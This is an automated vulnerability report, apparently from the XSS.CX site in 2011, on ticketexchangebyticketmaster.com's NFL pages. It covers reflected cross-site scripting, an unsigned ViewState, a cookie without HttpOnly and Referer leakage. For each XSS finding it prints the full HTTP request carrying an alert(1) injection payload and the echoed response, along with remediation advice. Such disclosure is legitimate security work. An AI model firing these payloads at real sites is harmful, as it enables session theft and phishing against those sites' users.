XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, ticketexchangebyticketmaster.com

Report generated by XSS.CX at Sun Jun 05 06:56:00 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.ticketexchangebyticketmaster.com/NFL/ [name of an arbitrarily supplied request parameter]

1.2. http://www.ticketexchangebyticketmaster.com/NFL/ [partnerCode parameter]

1.3. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx [name of an arbitrarily supplied request parameter]

2. ASP.NET ViewState without MAC enabled

2.1. http://www.ticketexchangebyticketmaster.com/NFL/

2.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx

3. Cookie without HttpOnly flag set

3.1. http://www.ticketexchangebyticketmaster.com/NFL/

3.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx

4. Cross-domain Referer leakage

5. Cross-domain script include

5.1. http://www.ticketexchangebyticketmaster.com/NFL/

5.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ticketexchangebyticketmaster.com/NFL/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d859"-alert(1)-"077466dbd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NFL/?7d859"-alert(1)-"077466dbd9=1 HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568627#5adb4447-0428-4f5b-86b5-4bf10cb54553; expires=Sun, 03-Jun-2012 01:27:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
rtist_team = "";
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Direct";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/?7d859"-alert(1)-"077466dbd9=1";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
   if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
       dtmSrc += "&" + item + "="
...[SNIP]...

1.2. http://www.ticketexchangebyticketmaster.com/NFL/ [partnerCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/

Issue detail

The value of the partnerCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9f95"-alert(1)-"cb482583d5b was submitted in the partnerCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NFL/?partnerCode=16068f9f95"-alert(1)-"cb482583d5b HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568624#5fe7b073-832c-46b2-b86d-ca6642b1b906; expires=Sun, 03-Jun-2012 01:27:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Unknown";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068f9f95"-alert(1)-"cb482583d5b";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
   if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
       dtmSrc += "&" + item + "=" +
...[SNIP]...

1.3. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ef9f"-alert(1)-"71eb405015c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NFL/default.aspx?7ef9f"-alert(1)-"71eb405015c=1 HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568712#27fa6ab0-d313-4595-9235-fcd769573453; expires=Sun, 03-Jun-2012 01:27:08 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
"";
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Direct";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/default.aspx?7ef9f"-alert(1)-"71eb405015c=1";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
   if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
       dtmSrc += "&" + item + "="
...[SNIP]...

2. ASP.NET ViewState without MAC enabled  previous  next
There are 2 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


2.1. http://www.ticketexchangebyticketmaster.com/NFL/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/

Request

GET /NFL/ HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568291#49f8186e-449e-42b4-aa0f-9cc8833f240e; expires=Sun, 03-Jun-2012 01:27:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NjEwODI2Nw9kFgZmD2QWBmYPFgIeB1Zpc2libGVnZAICDxYCHwBoZAIJDxYCHwBoZAICD2QWBgICDxYCHwBoZAIFDxYCHwBoZAIMDxYCHwBnZAIID2QWAgIDDw8WAh8AaGQWAmYPZBYCZg9kFgwCAQ8PFgIeB0VuYWJsZWRoZGQCAg8PFgIeBFRleHQFBjIwMTEyM2RkAgMPDxYCHwIFBjIwMTEyM2RkAgQPDxYCHwIFBjIwMTIwMWRkAgYPFgoeCmdvdGFHcm91cDBnHgpnb3RhR3JvdXAxZx4KZ290YUdyb3VwMmceCmdvdGFHcm91cDNnHglJdGVtQ291bnQCBBYQZg9kFgJmDxUBDkZyaWRheSwgSnVuLiAzZAIBD2QWAmYPFQgHNzoxNSBQTQATU3QuIExvdWlzIENhcmRpbmFscwxDaGljYWdvIEN1YnMNQnVzY2ggU3RhZGl1bQAsL2ludmVudG9yeWJyb3dzZS90aWNrZXRsaXN0LmFzcHg/UElEPTEwMzM4MDAyL3NlbGx5b3VydGlja2V0c25vdy90aWNrZXRkZXRhaWxzLmFzcHg/UElEPTEwMzM4MDBkAgIPZBYCZg8VARBTYXR1cmRheSwgSnVuLiA0ZAIDD2QWAmYPFQgHMzoxMCBQTQATU3QuIExvdWlzIENhcmRpbmFscwxDaGljYWdvIEN1YnMNQnVzY2ggU3RhZGl1bQAsL2ludmVudG9yeWJyb3dzZS90aWNrZXRsaXN0LmFzcHg/UElEPTEwMzM4MDIyL3NlbGx5b3VydGlja2V0c25vdy90aWNrZXRkZXRhaWxzLmFzcHg/UElEPTEwMzM4MDJkAgQPZBYCZg8VAQ5TdW5kYXksIEp1bi4gNWQCBQ9kFgJmDxUIBzE6MTUgUE0AE1N0LiBMb3VpcyBDYXJkaW5hbHMMQ2hpY2FnbyBDdWJzDUJ1c2NoIFN0YWRpdW0ALC9pbnZlbnRvcnlicm93c2UvdGlja2V0bGlzdC5hc3B4P1BJRD0xMDMzODA0Mi9zZWxseW91cnRpY2tldHNub3cvdGlja2V0ZGV0YWlscy5hc3B4P1BJRD0xMDMzODA0ZAIGD2QWAmYPFQEOTW9uZGF5LCBKdW4uIDZkAgcPZBYCZg8VCAc3OjEwIFBNAA9DaW5jaW5uYXRpIFJlZHMMQ2hpY2FnbyBDdWJzF0dyZWF0IEFtZXJpY2FuIEJhbGxwYXJrACwvaW52ZW50b3J5YnJvd3NlL3RpY2tldGxpc3QuYXNweD9QSUQ9MTAzNDUxMzIvc2VsbHlvdXJ0aWNrZXRzbm93L3RpY2tldGRldGFpbHMuYXNweD9QSUQ9MTAzNDUxM2QCCA8PFgIfAWhkZGQ=" />
...[SNIP]...

2.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/default.aspx

Request

GET /NFL/default.aspx HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568319#16fbc45d-3a18-4c7d-b7a7-9cd7fdcf95cc; expires=Sun, 03-Jun-2012 01:27:02 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NjEwODI2Nw9kFgZmD2QWBmYPFgIeB1Zpc2libGVnZAICDxYCHwBoZAIJDxYCHwBoZAICD2QWBgICDxYCHwBoZAIFDxYCHwBoZAIMDxYCHwBnZAIID2QWAgIDDw8WAh8AaGQWAmYPZBYCZg9kFgwCAQ8PFgIeB0VuYWJsZWRoZGQCAg8PFgIeBFRleHQFBjIwMTEyM2RkAgMPDxYCHwIFBjIwMTEyM2RkAgQPDxYCHwIFBjIwMTIwMWRkAgYPFgoeCmdvdGFHcm91cDBnHgpnb3RhR3JvdXAxZx4KZ290YUdyb3VwMmceCmdvdGFHcm91cDNnHglJdGVtQ291bnQCBBYQZg9kFgJmDxUBDkZyaWRheSwgSnVuLiAzZAIBD2QWAmYPFQgHNzoxNSBQTQATU3QuIExvdWlzIENhcmRpbmFscwxDaGljYWdvIEN1YnMNQnVzY2ggU3RhZGl1bQAsL2ludmVudG9yeWJyb3dzZS90aWNrZXRsaXN0LmFzcHg/UElEPTEwMzM4MDAyL3NlbGx5b3VydGlja2V0c25vdy90aWNrZXRkZXRhaWxzLmFzcHg/UElEPTEwMzM4MDBkAgIPZBYCZg8VARBTYXR1cmRheSwgSnVuLiA0ZAIDD2QWAmYPFQgHMzoxMCBQTQATU3QuIExvdWlzIENhcmRpbmFscwxDaGljYWdvIEN1YnMNQnVzY2ggU3RhZGl1bQAsL2ludmVudG9yeWJyb3dzZS90aWNrZXRsaXN0LmFzcHg/UElEPTEwMzM4MDIyL3NlbGx5b3VydGlja2V0c25vdy90aWNrZXRkZXRhaWxzLmFzcHg/UElEPTEwMzM4MDJkAgQPZBYCZg8VAQ5TdW5kYXksIEp1bi4gNWQCBQ9kFgJmDxUIBzE6MTUgUE0AE1N0LiBMb3VpcyBDYXJkaW5hbHMMQ2hpY2FnbyBDdWJzDUJ1c2NoIFN0YWRpdW0ALC9pbnZlbnRvcnlicm93c2UvdGlja2V0bGlzdC5hc3B4P1BJRD0xMDMzODA0Mi9zZWxseW91cnRpY2tldHNub3cvdGlja2V0ZGV0YWlscy5hc3B4P1BJRD0xMDMzODA0ZAIGD2QWAmYPFQEOTW9uZGF5LCBKdW4uIDZkAgcPZBYCZg8VCAc3OjEwIFBNAA9DaW5jaW5uYXRpIFJlZHMMQ2hpY2FnbyBDdWJzF0dyZWF0IEFtZXJpY2FuIEJhbGxwYXJrACwvaW52ZW50b3J5YnJvd3NlL3RpY2tldGxpc3QuYXNweD9QSUQ9MTAzNDUxMzIvc2VsbHlvdXJ0aWNrZXRzbm93L3RpY2tldGRldGFpbHMuYXNweD9QSUQ9MTAzNDUxM2QCCA8PFgIfAWhkZGQ=" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.ticketexchangebyticketmaster.com/NFL/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NFL/ HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568291#49f8186e-449e-42b4-aa0f-9cc8833f240e; expires=Sun, 03-Jun-2012 01:27:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...

3.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NFL/default.aspx HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568319#16fbc45d-3a18-4c7d-b7a7-9cd7fdcf95cc; expires=Sun, 03-Jun-2012 01:27:02 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...

4. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /NFL/?partnerCode=16068 HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568301#858d4cbd-217a-49ec-8936-b267b2f83e7e; expires=Sun, 03-Jun-2012 01:27:02 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
</title><link rel="stylesheet" href="http://static.nfl.com/static/site/styles/redesign/global.css" type="text/css" /><link rel="stylesheet" href="http://static.nfl.com/static/site/styles/global-alt-layout.css" type="text/css" />

<script type="text/javascript">
...[SNIP]...
</script>

<script src="http://static.nfl.com/static/site/scripts/lib/prototype-1.6.0.3.js"
type="text/javascript">
</script>

<script src="http://static.nfl.com/static/site/scripts/scriptaculous-1.8.1/scriptaculous.js?load=effects"
type="text/javascript">
</script>

<script src="http://static.nfl.com/static/site/scripts/lib/swfobject.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/nfl.global.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/polls.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/nfl.global-alt.js"
type="text/javascript">
</script>
...[SNIP]...
<meta name="msvalidate.01" content="961067BFAEA8C40F29C816E73EF9B1E5" /><script src="http://content.ticketsnow.com/scripts/WebTrend/LibScriptBlock.js" type="text/javascript"></script>
...[SNIP]...
<!-- End Dotomi Tag --><link rel="shortcut icon" href="http://content.ticketsnow.com/graphics/NFL/favicon_NFL.ico" /><link rel="icon" href="http://content.ticketsnow.com/graphics/NFL/favicon_NFL.ico" /><link rel="image_src" href="http://content.ticketsnow.com/graphics/Facebook/facebook_tm_profile_icon.jpg" />
           <link href="/UI/CSS/TNow3cMasterCss.aspx?nodeID=3" type="text/css" rel="stylesheet" />

           <link href="http://content.ticketsnow.com/Css/Microsite/NFLsplash.css" type="text/css" rel="stylesheet" />

           <link href="http://content.ticketsnow.com/Css/Master/SubMenu.css" type="text/css" rel="stylesheet" />

           <link href="http://content.ticketsnow.com/Css/PowerSearch/CalendarBox.css" type="text/css" rel="stylesheet" />

           <script src="http://content.ticketsnow.com/scripts/Master/TNow3Master.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/master/common.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/ExactTarget/Tracking.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/Master/CalendarBox.js" type="text/javascript"></script>
...[SNIP]...
<li id="link-mobile"><a href="http://www.nfl.com/mobile">Mobile</a></li>
       <li id="link-nflatino"><a href="http://www.nflatino.com/" target="_blank">NFLatino.com</a>
...[SNIP]...
<h3>
               <a href="http://www.nfl.com/fans">Fans</a>
...[SNIP]...
<li><a href="http://www.nfl.com/fans?icampaign=Nav_SM_Fans">Community Home</a>
...[SNIP]...
<li><a href="http://www.nfl.com/fans/forums?icampaign=Nav_SM_Forums">Forums</a>
...[SNIP]...
<li><a href="http://www.facebook.com/nfl" target="_blank">NFL on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/nfl" target="_blank">NFL on Twitter</a>
...[SNIP]...
<li><a href="http://www.nfl.com/tools?icampaign=Nav_SM_Tools">NFL Widget</a>
...[SNIP]...
<li id="link-user-register"><a href="https://id2.s.nfl.com/fans/register?returnTo=%2Fpartner%2Ftemplate">Register</a>
...[SNIP]...
<li id="link-user-sign-in"><a href="https://id2.s.nfl.com/fans/login?returnTo=%2Fpartner%2Ftemplate">Sign In</a></li>
       <li id="link-user-sign-out" style="display:none"><a href="https://id2.s.nfl.com/fans/logout?returnTo=%2Fpartner%2Ftemplate">Sign Out</a>
...[SNIP]...
<li><a class="BUF" target="_blank" href="http://www.buffalobills.com/">Buffalo Bills <span>
...[SNIP]...
<li><a class="MIA" target="_blank" href="http://www.miamidolphins.com/">Miami Dolphins <span>
...[SNIP]...
<li><a class="NE" target="_blank" href="http://www.patriots.com/">New England Patriots <span>
...[SNIP]...
<li><a class="NYJ" target="_blank" href="http://www.newyorkjets.com/">New York Jets <span>
...[SNIP]...
<li><a class="BAL" target="_blank" href="http://www.baltimoreravens.com/">Baltimore Ravens <span>
...[SNIP]...
<li><a class="CIN" target="_blank" href="http://www.bengals.com/">Cincinnati Bengals <span>
...[SNIP]...
<li><a class="CLE" target="_blank" href="http://www.clevelandbrowns.com/">Cleveland Browns <span>
...[SNIP]...
<li><a class="PIT" target="_blank" href="http://www.steelers.com/">Pittsburgh Steelers <span>
...[SNIP]...
<li><a class="HOU" target="_blank" href="http://www.houstontexans.com/">Houston Texans <span>
...[SNIP]...
<li><a class="IND" target="_blank" href="http://www.colts.com/">Indianapolis Colts <span>
...[SNIP]...
<li><a class="JAC" target="_blank" href="http://www.jaguars.com/">Jacksonville Jaguars <span>
...[SNIP]...
<li><a class="TEN" target="_blank" href="http://www.titansonline.com/">Tennessee Titans <span>
...[SNIP]...
<li><a class="DEN" target="_blank" href="http://www.denverbroncos.com/">Denver Broncos <span>
...[SNIP]...
<li><a class="KC" target="_blank" href="http://www.kcchiefs.com/">Kansas City Chiefs <span>
...[SNIP]...
<li><a class="OAK" target="_blank" href="http://www.raiders.com/">Oakland Raiders <span>
...[SNIP]...
<li><a class="SD" target="_blank" href="http://www.chargers.com/">San Diego Chargers <span>
...[SNIP]...
<li><a class="DAL" target="_blank" href="http://www.dallascowboys.com/">Dallas Cowboys <span>
...[SNIP]...
<li><a class="NYG" target="_blank" href="http://www.giants.com/">New York Giants <span>
...[SNIP]...
<li><a class="PHI" target="_blank" href="http://www.philadelphiaeagles.com/">Philadelphia Eagles <span>
...[SNIP]...
<li><a class="WAS" target="_blank" href="http://www.redskins.com/">Washington Redskins <span>
...[SNIP]...
<li><a class="CHI" target="_blank" href="http://www.chicagobears.com/">Chicago Bears <span>
...[SNIP]...
<li><a class="DET" target="_blank" href="http://www.detroitlions.com/">Detroit Lions <span>
...[SNIP]...
<li><a class="GB" target="_blank" href="http://www.packers.com/">Green Bay Packers <span>
...[SNIP]...
<li><a class="MIN" target="_blank" href="http://www.vikings.com/">Minnesota Vikings <span>
...[SNIP]...
<li><a class="ATL" target="_blank" href="http://www.atlantafalcons.com/">Atlanta Falcons <span>
...[SNIP]...
<li><a class="CAR" target="_blank" href="http://www.panthers.com/">Carolina Panthers <span>
...[SNIP]...
<li><a class="NO" target="_blank" href="http://www.neworleanssaints.com/">New Orleans Saints <span>
...[SNIP]...
<li><a class="TB" target="_blank" href="http://www.buccaneers.com/">Tampa Bay Buccaneers <span>
...[SNIP]...
<li><a class="ARI" target="_blank" href="http://www.azcardinals.com/">Arizona Cardinals <span>
...[SNIP]...
<li><a class="STL" target="_blank" href="http://www.stlouisrams.com/">St. Louis Rams <span>
...[SNIP]...
<li><a class="SF" target="_blank" href="http://www.sf49ers.com/">San Francisco 49'ers <span>
...[SNIP]...
<li><a class="SEA" target="_blank" href="http://www.seahawks.com/">Seattle Seahawks <span>
...[SNIP]...
L.COM..."
name="query" style="background: #F0F0F0 none repeat scroll 0% 0%; text-align: right; vertical-align: top; border:0; margin-top:3px; height: 16px; width: 230px;">
<img id="hd-search-button" onmouseover="document.body.style.cursor = 'pointer';"
onclick="redirectQuery();" onmouseout="document.body.style.cursor = 'default';"
src="http://static.nfl.com/static/site/img/home-2010/search.png" name="search-button"
type="image">
</div>
...[SNIP]...
<div id="header-logo">
